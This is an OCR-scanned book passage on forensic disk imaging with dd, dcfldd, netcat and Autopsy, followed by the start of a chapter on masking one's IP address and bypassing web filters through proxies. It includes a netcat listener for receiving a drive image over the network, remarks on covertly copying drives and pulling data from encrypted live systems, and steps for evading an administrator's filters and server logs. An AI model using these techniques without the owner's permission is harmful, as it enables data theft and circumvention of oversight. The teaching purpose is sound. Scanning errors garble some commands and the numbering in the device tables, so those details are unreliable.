the dd program is not as easy as using FTK Imager, because you need to be comfortable with the 
command line as well as Linux drive letter and partitioning schemes. If you follow some basic 
recommended guidelines, you will be able to easily image a person’s drive. When a person’s drive 
is imaged correctly using a dd with a Linux CD, there is virtually no way to detect that the drive 
has been imaged. However, you need to be extremely careful when you are imaging or you could 
wind up accidently overwriting the drive you are trying to copy. 

In this example, I will take an image of a system running Windows 7. The directions for imag- 
ing all other operating systems are pretty much the same. Even a Mac can be imaged using similar 
techniques. Before you image a system, you will need to download an ISO image that will allow 
you to boot to a Live CD. 


Understanding How Linux Recognizes Devices 


To use most computer forensics tools effectively, it is imperative that you understand how Linux 
when you are performing an acquisition of a drive. When you are performing an acquisition of a 
drive, it is extremely important that you grasp how Linux designates drive letter assignments. If you 
do not have a good grasp of Linux drive and partition schemes, you could wind up deleting the drive. 

While many Windows users initially find Linux drive designations hard to work with, they 
eventually come to understand how straightforward the process is in Linux. In contrast, when you 
insert a drive into a Windows system, you never know what letter is going to be assigned to the 
device. The Linux drive lettering and partitioning process is both sequential and predictable. Once 
you understand how Linux recognizes devices, you will appreciate the control that Linux provides 
the user for managing devices on the system. 

Linux uses different naming conventions for floppies, IDE hard disks, and small computer 
systems interface (SCSI), SATA, and USB drives. It is important to understand these differences 
so you are able to correctly identify the source drive and the destination drive, or target. If you 
make a mistake, you could wind up erasing the original drive. And, yes, I have seen this done. 

The floppy naming conventions are very straightforward (see Table 3.1). In Linux, there can 
be up to 10 floppy drives for some reason. I have personally never seen more than two in a com- 
puter connected to the motherboard controller. USB floppy devices are seen as USB devices, not 
floppies. 

It is important to note that the IDE naming conventions will only be used through Linux 
kernel 2.6.21. In Linux distributions with a kernel newer than 2.6.21, everything will use the 
SCSI naming conventions. The likely reason for the phasing out of the IDE naming conventions 
is probably tied to the fact that IDE drives are being phased out and replaced by SATA drives. 


Table3.1 Linux Floppy Drive Designations 


/dev/fd0 First floppy drive 
/dev/fd1 Second floppy drive 
/dev/fd4 Fifth floppy drive 
/dev/fd9 Tenth floppy drive 
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Typically, older computer systems have two IDE controllers, referred to as the primary and 
secondary controllers. Each controller can support up to two devices. If two devices are attached 
on a single IDE cable to the controller, one of the devices is labeled “master” and the other device 
is labeled "slave." Jumpers on the drive are used to configure the master or slave designation. 

There are four drive letter designations for an IDE drive, hda through hdd (see Table 3.2). The 
primary master drive in Linux is labeled hda; the primary slave drive is labeled hdb. The secondary 
master is labeled hdc; the secondary slave is labeled hdd. 

SCSI devices are still available today but not as common as they once were in the past. You 
will often see SCSI devices in server environments. The naming convention for SCSI devices is 
fairly simple. The SCSI naming convention applies to SCSI devices, as well as SATA and USB 
drives. And, the SCSI naming convention will also apply to IDE devices in Linux kernels 2.6.21 
and later. 

The first SCSI, SATA, or USB device is labeled is sda. The second SCSI, SATA, or USB device 
is labeled sdb, the third SCSI, SATA, or USB device is labeled sdc, and so on. The 25" device is 
labeled sdy and the 26" is labeled sdz. Twenty-six drive letters is the maximum you can have in 
Microsoft Windows, but Linux allows for up to 676. The 27" device is labeled aa, and the 527€ 
device is az. The 534 device is labeled bb and the 676" device is labeled zz (see Table 3.3). 

Each drive in Linux can have either four primary partitions or three primary partitions and 
one extended. Within that extended partition, you can have several logical drives. Partitions are 
numbered 1—4 and logical drives start at 5. The first partition is labeled 1, the second partition 
is 2, the third partition is 3, and the fourth partition is 4. These partitions can be primary or 
extended. However, you can only have one extended partition. The extended partition is the place 
in which the logical drives are created. The number 5 designates the first logical drive, 6 designates 
the second logical drive, 7 designates the third logical drive, and so on. Anything numbered 1—4 


Table 3.2 Linux IDE Drive Designations 


/dev/hda Primary master IDE 
/dev/hdb Primary slave IDE 
/dev/hdc Secondary master IDE 
/dev/hdd Secondary slave IDE 


Table 3.3 Linux SCSI Drive Designations 


/dev/sda First SCSI/SATA/USB device 
/dev/sdb Second SCSI/SATA/USB device 
/dev/sdz 26th SCSI/SATA/USB device 
/dev/sdaa 27% SCSI/SATA/USB device 
/dev/sdaz 524 SCSI/SATA/USB device 
/dev/sdab 53'd SCSI/SATA/USB device 
/dev/sdzz 676'^ SCSI/SATA/USB device 
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is a partition (primary or extended). Anything 5 or above is a logical drive. Logical drives reside 
in the extended partition. 

So, if a drive is labeled hdal, the 1 designates the first partition on that primary master IDE 
drive. If a drive is labeled hdc5, that is the first logical drive on the secondary master. A designation 
of sdb3 means the third partition on the second SCSI/SATA/USB drive. A designation of sde8 
means the fourth logical partition on the fifth SCSI/SATA/USB drive. With practice, you will 
master it! Some examples are shown in Table 3.4. 

Many of you may think you have used fdisk before because you used a program with a similar 
name in early versions of Windows. The fdisk is Windows is not the same program at all; the old 
Windows version of fdisk could never dream of doing things that the Linux program can do! For 
one, the Windows fdisk program will not see the entire drive on media with a large capacity. The 
Linux fdisk program is capable of seeing drives that are terabytes in size. The Windows fdisk pro- 
gram has two choices for file systems, FAT16 and FAT32. The Linux fdisk program supports over 
80 different file systems! And finally, the Linux fdisk program allows you to partition a thumb 
drive. You cannot partition a thumb drive at all on most versions of Microsoft Windows! On 
Linux, completing a task like partitioning a thumb drive is no problem. 


Table 3.4 Linux Drive and Partition Designations 


hda1 First partition, primary master IDE device 

hdd5 First logical drive, secondary slave IDE device 
sdd1 First partition, fourth SCSI/SATA/USB device 

sdc6 Second logical drive, third SCSI/SATA/USB device 
hdb4 Fourth partition, primary slave IDE device 

sdz11 Seventh logical drive, 26'^ SCSI/SATA/USB device 
hdb8 Fourth logical drive, secondary slave IDE device 
sdaa5 First logical drive, 27^ SCSI/SATA/USB device 
sdf7 Third logical drive, sixth SCSI/SATA/USB device 
sdt6 Second logical drive, 20'^ SCSI/SATA/USB device 
hdb4 Fourth partition, primary slave IDE device 

hdb2 Second partition, primary slave IDE device 

hdb3 Third partition, primary slave IDE device 

hdc6 Second logical drive, secondary master IDE device 
sde4 Fourth partition, fifth SCSI/SATA/USB device 
sdc10 Sixth logical drive, third SCSI/SATA/USB device 
hdc4 Fourth partition, secondary master IDE device 
sdp3 Third partition, 16^ SCSI/SATA/USB device 
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The fdisk command is extremely important when you are trying to determine what drives are 
in a system. It will be one of the most utilized commands when you perform computer forensic 
acquisitions. The fdisk command is used to view a list of the drives in your system. The command 
will also help you determine what partitions and logical drives exist on each disk in the system. 

The fdisk command will give you information about the drives in your system. There is a trick 
to using fdisk that will make computer forensics acquisitions easier. Type fdisk —1 to view what 
drives are in the system. Then add your acquisition (or target) drive and type fdisk -l a second 
time. You will be able to determine what your acquisition drive is by examining the new device 
displayed by the fdisk command. 

Perform the following steps to examine the disks on your system in Linux: 


1. Boot up to BackTrack 4 Beta on your Windows system. 
2. Type fdisk —I to view the disks and partitions on your system. 


root@bt: ~ - Shell - Konsole 


@ Shell 


If I add an acquisition drive that is a USB mass storage device and type the fdisk -1 command 
again, I will be able to know what the naming convention for my target drive is. 
Typing fdisk -l allows you to view the naming convention for the added device. 


root@bt: ~ - Shell - Konsole 


Session Edit View Bookmarks Settings Help 


*j| at shen { 
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‘The new target drive is highlighted in red. Notice the first time fdisk — was typed that the 
system only recognized one disk. That is because the target disk had not yet been added; the target 
drive in this case is a 500 GB NTFS mass storage device. By typing fdisk —] before and after you 
add your destination drive, you can be confident you know which drive is the source and which 
drive is the target. Another clue to look at is the numbering scheme. My internal drive receives the 
designation of sdal. My external drive is a USB, was added after the system booted into Linux, 
and receives a designation of sda2. It is important to utilize such techniques so that the correct 
drive is acquired. 

Linux users have complete control over which devices can be used on a system. Before a device 
can be used in Linux, it must be mounted. Linux allows you to mount disks as read/write or as 
read only. This is extremely important to computer forensics; a suspect’s media should be mounted 
as read only to avoid any type of contamination. It is not possible to use drives (other than floppy 
and CD-ROMs) as read only in Windows without an additional expensive piece of hardware 
called a write blocker, or a registry hack. 

In Linux, most individuals mount their disks, CD-ROMs, and floppies to a folder within 
the /mnt or /media folder. These folders do not have to be used for mount points, but it is a 
good standard practice. Windows shares can also be mounted using the common internet file 
system (CIFS). Once you are finished with a device, it should be unmounted to ensure that 
data is written to the device. 


Creating a Forensic Image 


The dd command has been around in for a long time; its origin can be traced back to the early 
days of Unix. The dd command can be used in Linux to back up files, folders, or to backup an 
entire drive. What is interesting about dd as opposed to other backup utilities is it will allow 
you to copy everything on the drive including deleted files, folders, and items that are residing 
in slack space. The dd tool can be utilized within any Linux distribution to copy the original 
media. To prove that the copy is the same as the original media, a hash such as shal can be 
used. If the hash is the same on both data sets, it proves that the two drives contained the exact 
two data sets. 

I find that thumb drives are also useful for practicing imaging because it is important to use 
disks that are small enough. The great thing about floppies and small thumb drives is they can 
often be imaged in RAM while using a Live CD. If you have a smaller 1 GB or 2 GB thumb drive, 
they would be ideal for practicing your imaging. Within dd, if is used to specify the source disk 
and of is used to specify the destination drive. We can use dcfldd instead of dd so we can get a 
progress bar. 

Perform the following steps to examine the disks on your system in Linux. Use the fdisk com- 
mand before placing your thumb drive in the computer. Use caution as this exercise can wipe your 
drive if you do not know what you are doing! 


1. Type fdisk —1 to view the current disks. 

2. Put your thumb drive in the computer. 

3. Type fdisk — to find what designation the thumb drive has received. View the disks and 
partitions on your system. 
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4. The fdisk —1 command displays the added USB thumb drive. 


root@bt: — - Shell - Konsole 


Session Edit View Bookmarks Settings 


@ Shell 


5. Use the defldd command to image the thumb drive by typing the following command: 
dcfldd. 


root@bt: / - Shell - Konsole ————" \ 


Session Edit View Bookmarks Settings Help 


The progress bar will indicate how far along the image process is. When the imaging process 
is complete, you will receive messages indicating the number of MB copied, and the number 
of records in and out. 


root@bt: / - Shell - Konseit 
Bookmarks Settings Help 


Computer forensics professionals like to hash the image and the original media to prove they 
are “forensically equivalent.” 
6. If you have a desire to hash the media and image, type the following commands: 


md5sum /mnt/sdal/usb.img 
md5sum /dev/sdb 
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(Hashing can also be done while dcfldd is running. Type dcfldd -- help for more info.) 


root@bt: / - Shell - Konsole 
Edit View Bookmarks Settings Help 


[23] | t Shell [ 


In the example the MD5 hash is utilized. Both the USB disk and the image have corresponding 
hash values, so we can be extremely confident that the data sets are equivalent. Any of the SHA 
utilities, including shal, shalsum, sha224sum, sha256sum, sha384sum, and sha512sum, could 
have also been utilized. 

Imaging a hard drive is not much different than imaging a USB stick. However, a sufficient 
amount of space for the image file is needed, and sometimes a sufficient amount of space is not 
enough either. If your destination drive is formatted with the FAT32 file system, you will need to 
split the image into chunks because there is a 4-GB file limit on FAT32 partitions. I just recom- 
mend converting the drive to NTFS or formatting it using the NFTS file system if it is blank. While 
NTES drives may be easy to work with when imaging, operating systems such as Mac OS X may 
not be able to write to drives formatted with the NTFS file system (without additional software). 

It is very important that you do not copy drives without the permission of the computer's 
owner. Hackers can use these techniques to copy someone's drive and extract the data from them 
without their knowledge. There was a case in the media where an individual turned auditing on 
and asked his local computer company to "install" software for him. He then checked the audit logs 
and found that employees of the store had accessed the files and folders throughout the hard disk. 
However, if the employees of that store had made a forensic copy of the disk, and only performed 
the install on the original disk, the audit logs would not have revealed any activity outside the scope 
of the job. This is a good example of how a hacker could use computer forensic imaging techniques. 

While the dd command can be used to create forensic copies, it was not designed as a forensic 
tool. The dcfldd command will give you a status bar that indicates how much of the data has been 
copied. And, if the hash=md5 option is specified, the MD5 hash will be calculated on the fly. This 
saves you the extra step of having to go back and calculate the hash after you create the image. The 
two major benefits of the dcfldd tool are the status indication and the calculation of the hash during 
the image process. The dcfldd status bar indicates how much of the image has been written. 


[4 rootGbt: ~ - Shell - Konsole 


Session Edit View Bookmarks Settings Help 


|| at Shell | 


Using the dcfldd command is going to be very similar to using the dd command. One of the 
differences will be that you will want to specify the hash2md5 option when using dcfldd because 
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it will calculate the hash *on the fly." Using regular dd and the md5 command afterward can take 
twice as long as using dcfldd. The advantage of using dcfldd over dd is that it calculates the hash 
while the image is being created when hash=md5 is specified. Specifying the hash=md5 option 
will calculate the MD5 hash while the image is being created: 


dcfldd if=/dev/sda of=/mnt/sdb/hd.dd hash=md5 


Also available on BackTrack 3 and BackTrack 5 is the de3dd command. The dc3dd tool 
was released recently and enhances the imaging experience with even more improvements. Even 
though dc3dd is not available from the K menu within BackTrack 3, it is still available. 

Perform the following steps to examine the disks on your system in Linux. Use the fdisk com- 
mand before placing your acquisition or destination drive in the computer. Use caution as this 
exercise can wipe your drive if you do not know what you are doing! 


1. Shut down the system cleanly and boot to the BackTrack 3 CD. 
2. Type fdisk -1 to view the current disk(s). 


fdisk -l 


/dev/sda: 17.1 GB, 17179869184 bytes 
heads, 6 ctors/track, 2088 cyl 


cylinders of 16065 * 512 822 


Device Boot tart id System 
/dev/sdal c HPFS/NTFS 


3. Attach your USB mass storage device to the computer. 

4. Type fdisk —1 to find what designation the USB mass storage device has received. View the 
disks and partitions on your system. 

5. The fdisk —1 command displays the added USB mass storage device. 


^ctors/ 5 
ylinders of 2 : 5280 bytes 


Device Boot Start End Blocks Id System 
/dev/sdal L 2088 16771828+ 7 HPFS/NTFS 
Disk /dev/sdb: 500.1 GB, 500107862016 byte 
255 heads, 63 ^ctors/track, 608€ 
Units cylinders of 16065 * 512 


Device Boot 


6. Use the dcfldd command to image the entire hard disk by typing the following command: 
dcfldd if=/dev/sda of=/mnt/sdb1/hd.dd. 


dcfldd if=/dev/sda of=/mnt/sdbl/hd.dd 


768 blocks (24Mb) written. 
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The progress bar will indicate how far along the image process is. When the imaging process 
is complete, you will receive messages indicating the number of megabytes copied and the 
number of records in and out. You can take this image and load it into FTK, PTK, EnCase, 
Autopsy, or Live View. Computer forensics professionals like to hash the image and the 
original media to prove they are “forensically equivalent.” 

7. If you have a desire to hash the media and image, type the following commands: 
md5sum /mnt/sdb1/hd.dd 
md5sum /dev/sda 


Imaging over a Network 


Sometimes you do not have a spare drive available or you do not have physical access to the 
drive that you are trying to image. In this case, imaging a drive over a network using Netcat is 
extremely useful. Being able to image a drive over the network is going to become increasingly 
important as more people begin to use encryption. If you have access to a user’s computer while 
their session is loaded you can pull the information completely unencrypted from their system. 
BitLocker allows users to encrypts volumes. If you image an encrypted drive using standard 
techniques you will not be able to read any data. This is why you will hear some individuals 
within computer forensics claim that dead box forensics is dead. Dead box forensics just means 
you are walking up to a system that is turned off and performing an acquisition. But, if you 
access a system while it is running and image it, you can pull all the data over the network in an 
unencrypted manner. This is the beauty and danger of acquisitions over the network. If you are 
a computer forensic investigator, you can retrieve all data and analyze it. On the other hand, if a 
hacker gets in, they can own your data even if you are using encryption software like Microsoft’s 
BitLocker. 

In order to image a drive over the network, you need to have the Netcat program on the sys- 
tem to which you are transferring the image. If you are using a Windows system, you will have 
to download Netcat. Netcat for Windows can be downloaded from this link: http://joncraton. 
org/files/nclllnt.zip. After you download Netcat, unzip it and place nc.exe into the system32 
directory of your Windows folder. 


Note: Your antivirus may pick Netcat up as a virus; it is not a virus. It is actually a tool com- 
monly used by computer forensic investigators (as well as hackers). Netcat is already included with 
BackTrack as well as many other distributions of Linux, such as Fedora. 


In order to prepare a machine to receive the image, start the Netcat listener on the machine 
where you want the image to be stored. Caution: This is the location where the image will be 
transferred to, so make sure there is enough available space on the drive. 


1. Open a command prompt. Get to the root of the drive by typing cd \. 

2. Make a directory called images and go into the directory by typing 
mkdir images & & cd images. 

3. Type the following command to open up a Netcat listener on port 80: 
nc -l -p 80 > network.dd 
(port 80 and 443 are commonly allowed through firewalls). 

4, Opening a Netcat listener on a Windows system. 
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GY Shortcut to cmd.exe - nc -I -p 80 ME 


cd images 


> network.dd 


[iÈ Windows Security Alert g mès 


Windows Firewall has blocked this program from accepting incoming network connections. If you 
unblock this program, it will be unblocked on all public networks that you connect to. What are the 
[isks of unblocking a program? 


Path: C: Windows system32|nc.exe 
Network location: Public network 
What are network locations? 


If you are imaging a “live” or booted system, a hash will not be needed. The reason is in a live 
system changes are constantly being made to the hard disk. Any time something is changed or a 
file is accessed in Windows, the hash of the drive will change. Piping an image of a live system over 
the network using Netcat is known as live system forensics. Doing a hash when you are acquiring 
a live system will not make sense. 

If you are imaging a live Linux system, you will need Netcat. There is a high probability that 
the majority of the systems you will be imaging will be using Windows. This presents two major 
problems for you: 


1. Windows does not have the dd command or even use Linux naming conventions for hard 
disks. 


2. Windows does not have the netcat command. 


If you need to acquire a live Windows system, you can use Netcat, or if you are a fan of using 
GUI-based tools, you can use Helix from e-fense. It is available for download from their website, 
http://www.e-fense.com/helix/. After you insert the CD into your Windows system, click Accept 
to the warning screen if you agree to the disclaimer. 
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HELIX. v1.9 (07/13/2007) 


You are running this application in a LIVE Windows 
environment. There is ABSOLUTELY NO WAY to protect 
this live environment from changing. 


This application WILL make changes to the running 
system. This is an accepted risk you must be willing to 
take 


If you are not willing to accept this risk or do not 
understand what you are doing then exit now, otherwise 
agree and proceed at your own risk.... 


Brought to you by: 


r / Choose Your Language: [ITE 


http://www.e-fense.com 
helix@e-fense.com 


Acquire a "live" image of a Windows System using dd. 


Make sure you select the physical disk for the source (not the default—memory). 
Type in the destination “IP Address” and “destination port” of the machine with the Netcat 
listener running. Click OK to the notice message. 


Live Acquisition 


* Source: 
\\\PhysicalDriveO - VMware Virtual IDE Hard Drive [10 GB IDE ] 


e O 


Destination IP: 
| 192.168.1.200 
Port: aa 
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Remember, you do not have to worry about hashing when you are conducting a live computer 
forensics acquisition. If your colleagues tell you that dead box forensics is dead, tell them that is 
OK because you know how to do acquisitions of live boxes using Helix. This works great for drives 
when the user is logged in, regardless of whether those drives are encrypted using BitLocker or 
TrueCrypt. These techniques can also be utilized to acquire an image of a machine remotely. 


Examining an Image 


One you have your image, you can examine the files and folders without any forensic tool at all. 
All you need is Linux and the ability to use a calculator. However, the method described here will 
not allow you to view any deleted files and folders. 

Pretty much any version of Linux will allow you to parse through an image file of a disk (or 
partition). By using the fdisk command with some switches and a calculator, and the mount 
command, you can examine most any image file. To examine your newly created image file, con- 
nect the disk that contains the image file to any Linux system. Or, you can connect the image 
file to a Linux system running though VMware using the host guest file system (HGFS). To use 
HGES, you must have VMware Tools installed on your Linux distribution. You can actually just 
download preconfigured virtual machines with VMware Tools already installed from http://www. 
vmware.com/appliances/. 

If you are using VMware, and the image is being stored on your Microsoft Windows system, 
use the following steps to mount the disk image: 


1. Click VM from the menu bar, go to Settings and select Options. 

2. Click Shared Folders. 

3. Click Enabled until next power off or suspend. 

4. Click Add. 

5. Click Next. 

6. Browse to the folder where the image is stored and click OK. 

7. Name the folder “Images” and click Next. 

8. Verify that Enable this share is checked and the Read-only check is removed. Click Finish. 


Add Shared Folder Wizard X| 


Name the Shared Folder 
What would you like to call this shared folder? 


Host path 
C:\images Browse... 


Name 
nega 


The following steps will allow you to mount the disk image you have created: 


1. To mount the image, navigate to the location on the hard drive where the image is stored by 
typing cd /mnt/hgfs/images. 

2. Type fdisk -lu network.dd to determine the starting sector of the partition. 

3. Multiply the starting sector by 512. 
63 x 512 = 32256. 
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4, Make a directory by typing mkdir /mnt/images. 

5. Type mount -ro loop, offset=32256 -t ntfs /mnt/hgfs/images/network.dd /mnt/image. 
6. Type Is /mnt/image to view the contents of the image file. 

7. Browse through the image by using Konqueror. It is mounted as read-only. 


Shell - Konsole 
ls /mnt/hgfs/ 
images 
cd /mnt/hgfs/images/ 
ls 
network .dd* 
fdisk -lu network.dd 
You must set cylinders 
You can do this from the extra functions menu. 


Disk network.dd: 0 MB, © bytes 
255 heads, 63 sectors/track, 0 cylinders, total 0 sectors 
Units = sectors of 1 * 512 = 512 bytes 


Device Boot Start End Blocks Id Syste 
network .dd1 * 63 20948759 10474348+ 7 HPFS/ 
Partition 1 has different physical/logical endings: 
phys=(1023, 254, 63) logical=(1303, 254, 63) 
mkdir /mnt/image 
mount -ro loop,offset=32256 -t ntfs /mnt/hgfs/images/network.dd /mnt/image 
ls /mnt/image 
IAUTOEXEC . BAT MSDOS .SYS / ntldr 
" / pagefile.sys 
/ NTDETECT.COM boot.ini 
EER 


Autopsy 


Another forensic tool that can be used to view your images is Autopsy. Autopsy is actually a Web 
GUI tool that runs on top of Brian Carrier’s Sleuthkit. Autopsy is a free forensic tool that runs in 
various distribution of Linux. Other tools, like Encase and FTK can cost thousands of dollars. 
These proprietary tools also require a hardware dongle that helps these companies prevent software 
pirates from using unlicensed copies. 

Installing Autopsy and Sleuthkit is relatively easy. However, if you use the BackTrack distribu- 
tions, including 2, 3, 4, and 5, Autopsy is already installed and running. To launch Autopsy, just 
select BackTrack, Digital Forensic, All, and then Autopsy from the K menu. A window will pop 
up with the directions to go to http://localhost:9999/autopsy in your browser. Open Firefox or 
Konqueror and go to the URL. 


Autopsy Forensic Browser - Mozilla Firefox 


arses 
xus. [Ei packet storm) Baircrackng [ackstracktr fii somarm 
Autopsy Forensic Browser 2.08 


» [Metasploit £ Secur 


http: A hkit.on 
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1. Click the New Case button. 

2. Put in a case name and an investigator name (no spaces). Click the New Case button. 
3. Click the Add Host button. 

4. Click the Add Host button again. 

5. Click Add Image. 

6. Click Add Image File. 

7. In the location bar, type the path to the image file, /mnt/hgfs/images/network.dd. 
8. Click Next. 

9. 'The image should be recognized as an NTFS partition. 


10. Click Add. 

11. Click OK. 

12. Select C:/ and select the Analyze radio button. 

13. Click File Analysis. 

14. You will be able to view everything on the hard drive including NTFS system files and 
deleted files and folders. Red files are deleted files and folders. 


file Edit View History Bookmarks Tools Help 
Q- D- Q J QD B rinocmostsoospontopsimoget&submode26case Caseléhstehostttinv-jessete [v | P>] 


Lj Remote-Exploit. [Ñ RE Wiki fif Orrensive-Security [ifmiwom [ Metasploit & SecurityFocus [E] packet storm] Aircrack-ng Blleacrractr Mj so mer 


Imaging and Extraction W 117 


Conclusion 


A person who is well versed in computer forensics may be able to learn a lot about an individual 
from examining their hard drive, USB sticks, and other digital media. As we become a society 
more dependent on computers, smart phones, cameras, and other digital devices, the trail of evi- 
dence we leave behind as we go through our daily lives will continue to mount. 

Hard disks and other devices can be imaged using tools like FTK Imager and the Linux dd 
command. By understanding where and how artifacts are stored on digital media, a computer 
forensics investigator has the ability to parse an image file for valuable data. Most people are 
unaware of the trail they leave behind when they are using their computers or other digital devices. 

Technologies such as disk encryption will change the way computer forensics is practiced. 
However, solid fundamental knowledge of computer systems and forensic principals must be 
adhered to regardless of how technology is updated or changed. Both hackers and computer foren- 
sic examiners can use the same technique to build a profile of the person whose system they are 
examining. Whether that person has good or malicious intentions, they will not be able to effec- 
tively obtain information without a solid understanding of the basic principles involved in using 
computers. 


Chapter 4 


Bypassing Web Filters 


Introduction 


When you are on the Internet, you may feel like you have complete privacy but that is not actu- 
ally true. When you make a connection to a website your Internet protocol (IP) address and other 
information, such as browser version and operating system (OS) information, are logged to the 
server. To see an example of the kind of information you are providing to the sites you connect to, 
go to the website www. ipgoat.com. 


A ipGoat.com 
d The GOAT of the Internet 
Click here to check out our blog! 


E BOOKMARK af O A. 
Current IP Address 


72.81.255.124 


MUN d 
BAAA! * = MY ip 
Ej 


Advanced 


o Name Address: pool-72-81-255-124.bltmmd.fios.verizon.net 


© Remote Port: 4995 


Browser: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 
(F) 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; 
InfoPath.2) 


(F) Location: United States 


CMore Info Lookup who owns an IP | Traceroutes | 
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Information You Provide 


The following information is provided to the website when you make a connection: 


Your public IP address 
Your browser version 
Your country location 


Your OS version 
Your .NET version 


When you click the more info link on the bottom of the IPGoat home page, even more informa- 
tion about your system will be displayed, including 


Platform 

CPU class 

Detected plug-ins 

Java information 

Windows Media Player information 
Adobe information 


Most hackers realize that their actions on the Internet can be traced back to them through their 
IP address. If illegal activity is committed on a server, law enforcement may be able to get permis- 
sion to review the logs. If an individual's IP address shows up in the logs, it is possible they could 
be questioned or face some sort of legal repercussions if they were the perpetrator of the event in 
question. The person in question can, of course, avoid any type of prosecution if their IP is traced 
to a country where law enforcement lacks any kind of jurisdiction. 


/oefault.htm - 


Changing Information 


Serious hackers who are trying to avoid detection are well aware of some of the methods that can 
be utilized in order to avoid having their IP address traced. There are several methods that can be 
used to avoid having your IP address detected: 


m Web-based proxies 

E Proxies 

m TOR 

E Free virtual private network (VPN) services 
B Day services like HideMyIP 


Avoiding the detection of law enforcement is not the only reason that someone will use a tool to 
mask their IP address. In September of 2010, Harrisburg University of Science and Technology 
banned the use of all social media websites for a week. Students at the school could have utilized 
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any of the five methods mentioned above to bypass the restrictions placed on them by the school. 
Examples of web proxies include 


B ninjacloak.com 
B webproxy.ca 
B webáproxy.com 


Using sites like these is a relatively straightforward process. On the home page of these web proxy 
sites, there is a box that allows you to type in the uniform resource locator, or URL of the desired 
web target. After typing in the URL, click the button that says “Go” or "Surf Now.” 


Web4Proxy.Com 
Free Web Proxy Since 2005 
HomePage | Favorite | Free Code | Submit WebProxy | How To Use 
Hide your IP Address VIPRE Web Filtering 
Quickly change your ip address Start High-Performance Web Filtering. Created 
Surfing Anonymously Today. by Admins for Admins! 
RH Ads by Google 
nttp://www.espr[com Desired URL | Surf Now! 


Server 10.USA.SSL || web Proxy Servers 


AdsbyGoogle  FreeProxy Proxy Server Proxy Web Proxy IP Proxy List 


Both Ninjacloak and web4proxy.com offer secure sockets layer (SSL) options, meaning that 
your traffic will be encrypted. This gives the person using the proxy an additional layer of protec- 


tion. To use SSL on web4proxy.com, just drop down to the tenth server in the list. To use SSL with 
Ninjacloak, click che Enable HTTPS Secure Mode link. 


Enable 


fnep://uwwespnicom Do 


W uo: kies Remove Scnpts No referrer 


Although webproxy.ca does not have an option to allow you to use SSL, it does have several 
advanced options. By clicking the Options tab on webproxy.ca, you have the ability to disallow 
cookies or remove scripts, flash, or images. 


|www.espn.com | Go |[options] 


| Encode URL 
Encode Page (beta) 
[7] Allow Cookies 

[7] Remove Scripts 
Remove Images 
Remove Flash 


One example of why you might want to use a web proxy such as ninjacloak.com is to bypass 
a filter that the local network administrator placed on your network. For instance, when my net- 
work administrator blocked espn.com because of bandwidth issues, I was able to use a web proxy 
to bypass the restriction. However, if the network administrator thoroughly reviews their logs, 
they may notice web proxies are being used through analysis of web traffic. They can then choose 
to ban the web proxy sites, but there are an extremely large number of these types of sites, so ban- 
ning all web proxies is an extremely difficult task. 
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Another use for one of these web proxies is to evade detection in the logs of the web server. 
When you make a connection through a web proxy, the proxy’s IP address will show up in the web 
logs instead of your IP address. 


ipGoat.com 
The GOAT of the Internet 


Click here to check out our blog! 


£3 BOOKMARK af 7 Ar.. 


Current IP Address 


204.152.215.117 


) 


od 
BAAA! " MY ip 
~J 


Advanced 


QU) Name Address: 204.152.215.117.static.ioflood.com 
Remote Port: 41183 


Browser: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 
1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; 
InfoPath.2) 

Location: United States 


000 


When I visit the IPGoat.com website through ninjacloak.com, they indicate that I have an 
IP address of 204.152.215.117, even though my public-facing IP address is 72.81.255.124. When 
I used the nslookup command to find out the IP address of ninjacloak.com, one of their IP 
addresses actually traced back to 204.152.215.117. Even though my IP address was hidden, it 


appears that some information, like my browser and OS, were still reported to the web server. 


Bi Shortcut to cmd.exe 


s look 


Another way to hide your IP address is by using a proxy server. Proxy comes from Latin, mean- 
ing “on behalf of.” An example ofa proxy outside of the computer world would be if you and I were 
in a building and I went and got your lunch for you and brought it back for you. A proxy server 
just goes and retrieves the web pages on your behalf and brings them back to you. 

‘The website proxy-list.org has a list of proxy servers that originate from various countries. After 
you enter the enter the series of characters to prove you are a human (CAPTCHA), you can select, 
you can select various options, including proxy 


B Type 
E Port 
B Country 
m SSL 


Proxy List 


Free proxy list 


Forum about proxy 
Proxy extractor 
Show my IP 


Our friends 
Contacts 


English 
Pyccknn 
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ING xxx 


Looking for even better proxy $ S2 EENET ITEE 


SPecial information for anonymous surfing 


Free working proxies: 140 
VIP working proxies: 1200 

Checking interval: less than 1 min 
Server time: 2010-10-11 03:41:48 


| Search proxy from list 


Port: [ary pot Te] Type: [Erwe w 
Country: [any country ~ SSL: [any 


[Download proxy list in *.txt format 
All Listë" links link to files equal to “Paget” content. So instead of browsing each pare it is 
possible to simply click on "Lists" and download proxy list in * txt f 

PROXY LIST DOWNLOADER IS TEMPORAREI 


kee "n. 

5 STAR RATING CS. 
R 3 

[Working proxy list (anon. are shown with 10 min. delay) 


Proxy:Port Latency Type Country SSL Uptime Last work time 
219.70.207.8:9415 0.0000 Elite TW N 100% 2010-10-11 03:32:27 


m 123 


Just because a proxy is on the list does not mean it is going to work. You may have to try several before 
you find one that works. And even when you find a working proxy, it may not work for an extended 
period of time. Also, try to avoid using transparent proxies, because they might give away your real 
IP address. By using any other type of proxy, it will be unlikely that the sites the proxy is retrieving 
of your behalf will be able to trace the activity back to your IP address. But, keep in mind that the 
information, including your IP address and the sites you visit, will be in the proxy server's logs. 


To use a proxy in Internet Explorer, 


1. Select a proxy from the list on the proxy-list.org website (put in CAPTCHA). 
2. Open Internet Explorer. Select Tools, Internet Options, Connections, LAN Settings. 
3. Check the box to use a proxy server and put in the IP address and port of the proxy. Click 


OK twice. 


4. Visit the IPGoat.com website to verify that the proxy worked. 


‘Local Area Network (LAN) Settings ssi. 


r Automatic configuration 


Automatic configuration may override manual settings. To ensure the 
use of manual settings, disable automatic configuration. 


[C] automatically detect settings 
(Use automatic configuration script 


Address 


~ Proxy server 


Address: 


182.23.12.238 


(Bypass proxy server For local addresses 


124 m Defense against the Black Arts 


When I visit the IPGoat website, the IP address of the proxy server will likely be displayed instead 
of my own external IP address. The proxy address, not my actual public-facing IP address will be 
logged in the web server logs of IPGoat. 


ipGoat.com 
The GOAT of the Internet 


Click here to check out our blog! 


O BOOKMARK af O fr 


Current IP Address 


182.23.12.238 


